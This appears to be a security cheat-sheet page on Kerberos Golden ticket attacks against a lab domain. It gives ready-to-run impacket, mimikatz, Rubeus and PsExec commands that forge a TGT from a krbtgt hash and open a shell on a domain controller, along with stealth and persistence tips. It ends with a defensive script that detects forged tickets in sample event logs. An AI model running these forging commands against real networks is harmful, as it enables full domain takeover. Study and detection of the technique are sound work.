Golden ticket

The Golden ticket technique is similar to the Silver ticket one, but here a TGT (ticket-granting ticket) is forged with the NTLM hash of the krbtgt account, the key the KDC itself uses to encrypt every TGT in the domain. The advantage of forging a TGT instead of a TGS (service ticket) is that a domain controller will issue service tickets for any service (or machine) in the domain against it, so one forged ticket gives access everywhere. Besides the krbtgt hash you need the domain SID (a user SID with the trailing RID removed) and a user name to impersonate; the user does not have to exist, since the KDC never looks it up when validating a ticket encrypted with its own key. The krbtgt hash is normally obtained by DCSync or from a copy of NTDS.dit, so this is a post-compromise persistence technique rather than a way in: the ticket stays valid until the krbtgt password has been changed twice, because the KDC also accepts tickets encrypted with the previous key. Both tools below also accept the krbtgt AES key instead of the NTLM hash (impacket-ticketer -aesKey, mimikatz /aes256:), which yields an AES ticket that blends in better in a domain where RC4 tickets are unusual.

Create a ticket using the krbtgt account hash

Linux

impacket-ticketer -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/stegosaurus.ccache
impacket-psexec jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass

ticketer writes stegosaurus.ccache into the current directory (here /root), and KRB5CCNAME must hold the full path to it. psexec is pointed at the target's FQDN with -k (use the Kerberos ticket from the cache) and -no-pass; that name has to resolve from the attacking host (DNS or /etc/hosts), and the host's clock must be within five minutes of the domain controller's or the KDC rejects the request with a clock skew error.

Windows

.\mimikatz.exe
privilege::debug
kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:25b2076cda3bfd6209161a6c78a69c1c /user:stegosaurus
exit
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist
.\PsExec.exe -accepteula \\lab-wdc02.jurassic.park cmd

/user is the account name the forged ticket will claim (the RID defaults to 500, i.e. the built-in Administrator, and the groups to Domain Admins and friends), /rc4 takes the krbtgt NTLM hash and /domain and /sid must belong to the same domain. Without /ptt mimikatz writes the ticket to ticket.kirbi in the current directory; Rubeus ptt then injects it into the current logon session, klist confirms a krbtgt/JURASSIC.PARK ticket for stegosaurus is present, and PsExec against the DC uses it transparently.
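The flip side of the procedure above, as an added example that is not part of the original page: because the forged TGT never passed through a KDC, the first trace it leaves is a service ticket request (event 4769) for an account that never had a TGT request (event 4768) logged on any domain controller. The script below runs that correlation, plus a client-address check and the RC4 encryption type check, over constructed sample events. The event dicts and their field names (id, time, account, client, service, etype, status) are a simplified stand-in for the Security-log fields, and it assumes you feed it events collected from every DC in the domain.

```python
"""Hunt for forged (golden) TGTs in Windows Security-log Kerberos events.

A golden ticket is never issued by a KDC, so the first thing a DC sees is a
TGS-REQ (event 4769) for an account that has no successful TGT request
(event 4768) anywhere in the domain within the TGT's lifetime.  A ticket
forged from the krbtgt NT hash is also RC4-HMAC (etype 0x17), a useful
secondary signal in a domain that normally issues AES tickets.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry).  Field names are simplified
# versions of the Security-log fields: "client" is Client Address, "etype" is
# Ticket Encryption Type.  alice logs on normally; stegosaurus never asked the
# KDC for a TGT, which is exactly what a golden ticket looks like.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2024-05-01T09:00:00", "account": "alice",
     "client": "::ffff:10.0.0.5", "etype": 0x12, "status": "0x0"},
    {"id": 4769, "time": "2024-05-01T09:00:02", "account": "alice@JURASSIC.PARK",
     "client": "::ffff:10.0.0.5", "service": "cifs/lab-wdc02.jurassic.park",
     "etype": 0x12, "status": "0x0"},
    {"id": 4769, "time": "2024-05-01T09:15:00", "account": "stegosaurus@JURASSIC.PARK",
     "client": "::ffff:10.0.0.66", "service": "cifs/lab-wdc02.jurassic.park",
     "etype": 0x17, "status": "0x0"},
    # alice's ticket used from a host that never requested a TGT for her:
    # not orphaned, but worth a look (stolen or forged ticket on another box).
    {"id": 4769, "time": "2024-05-01T09:20:00", "account": "alice@JURASSIC.PARK",
     "client": "::ffff:10.0.0.66", "service": "cifs/lab-wdc02.jurassic.park",
     "etype": 0x12, "status": "0x0"},
]

# Windows default maximum lifetime for TGT renewal is 7 days; a legitimate TGT
# still in use must have produced a 4768 on some DC at least that recently.
DEFAULT_MAX_TGT_AGE = timedelta(days=7)


def account_of(event):
    """4769 logs 'user@REALM', 4768 logs the bare sAMAccountName; normalise both."""
    return event["account"].split("@", 1)[0].lower()


def client_of(event):
    """Strip the IPv4-mapped prefix the Security log puts on client addresses."""
    addr = event["client"]
    return addr[len("::ffff:"):] if addr.startswith("::ffff:") else addr


def _time(event):
    return datetime.fromisoformat(event["time"])


def _recent(times, when, max_age):
    return any(when - max_age <= t <= when for t in times)


def _tgt_index(events):
    """Map (account, client) -> times of successful TGT requests (status 0x0)."""
    index = defaultdict(list)
    for e in events:
        if e["id"] == 4768 and e.get("status", "0x0") == "0x0":
            index[(account_of(e), client_of(e))].append(_time(e))
    return index


def find_orphan_tgs(events, max_tgt_age=DEFAULT_MAX_TGT_AGE):
    """4769 events whose account had no successful 4768 from *any* client in
    the preceding max_tgt_age.  Needs events from every DC: the TGT may have
    been issued by a different DC than the one that issued the service ticket."""
    by_account = defaultdict(list)
    for (acct, _), times in _tgt_index(events).items():
        by_account[acct].extend(times)
    return [e for e in events if e["id"] == 4769
            and not _recent(by_account[account_of(e)], _time(e), max_tgt_age)]


def find_tgs_from_unseen_client(events, max_tgt_age=DEFAULT_MAX_TGT_AGE):
    """Weaker signal: 4769 from a client address that never obtained a TGT for
    that account, even though the account may be legitimately logged on elsewhere."""
    index = _tgt_index(events)
    return [e for e in events if e["id"] == 4769
            and not _recent(index[(account_of(e), client_of(e))], _time(e), max_tgt_age)]


def find_rc4_service_tickets(events):
    """Secondary signal: 4769 with Ticket Encryption Type 0x17 (RC4-HMAC).
    Legacy service accounts produce these too, so use it to rank the hits
    from the two checks above rather than on its own."""
    return [e for e in events if e["id"] == 4769 and e["etype"] == 0x17]


if __name__ == "__main__":
    checks = (("no TGT ever issued", find_orphan_tgs(SAMPLE_EVENTS)),
              ("TGS from client without TGT", find_tgs_from_unseen_client(SAMPLE_EVENTS)),
              ("RC4 service ticket", find_rc4_service_tickets(SAMPLE_EVENTS)))
    for label, hits in checks:
        for e in hits:
            print(f"[{label}] {e['time']} {account_of(e)} from {client_of(e)} -> {e['service']}")
```

Run on the constructed events, only stegosaurus trips the orphan-TGT check and the RC4 check, while the client-address check additionally flags alice's ticket being used from 10.0.0.66. The correlation window matters: a short window produces false positives for users riding a renewed TGT, which is why the default is the renewal lifetime rather than the 10-hour ticket lifetime.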
